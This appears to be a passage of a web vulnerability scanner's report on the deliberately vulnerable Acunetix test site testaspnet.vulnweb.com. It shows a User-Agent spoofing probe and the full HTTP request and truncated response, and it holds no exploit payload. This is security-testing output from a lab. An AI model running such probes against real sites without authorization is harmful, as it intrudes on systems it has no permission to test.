style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
Method	POST
Parameter	Header User-Agent
Attack	msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Show / hide Request and Response
Request Header - size: 426 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm) Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 Content-Length: 11097 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 11,097 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkfCyPhouoc9T07CkSiDvxgplY0cc%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKx7LcVAv6Q%2FOMBAtCnkuUEArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODAwK%2Fk%2F%2FECQK%2Fk%2F%2FECQK%2Fk5ObAQK%2Fk5ObAQK%2Fk4e%2BCgK%2Fk4e%2BCgK%2Fk7vVAwK%2Fk7vVAwK%2Fk6%2FoDAK%2Fk6%2FoDAK%2Fk8OMBAK%2Fk8OMBAK%2Fk%2FejDQK%2Fk%2FejDQK%2Fk%2BvGBgK%2Fk%2BvGBgK%2Fk9%2BvAwK%2Fk9%2BvAwK%2Fk%2FPCDAK%2Fk%2FPCDAKQut3rDwKQut3rDwKQuvGOBwKQuvGOBwKQuuUlApC65SUCkLqZ%2BAkCkLqZ%2BAkCkLqNnwECkLqNnwECkLqhsgoCkLqhsgoCkLrV1gMCkLrV1gMCkLrJ7QwCkLrJ7QwCkLq91QkCkLq91QkCkLrR6QICkLrR6QIC19mQngcC19mQngcC19mENQLX2YQ1AtfZuMgJAtfZuMgJAtfZrO8CAtfZrO8CAtfZwIMKAtfZwIMKAtfZ9KYDAtfZ9KYDAtfZ6P0MAtfZ6P0MAtfZnJAEAtfZnJAEZPSnvrIdg8X%2FqqjYsEEZ5ETd0S8%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:13 GMT Content-Length: 30709
Response Body - size: 30,709 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=2" id="Form1"> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgIC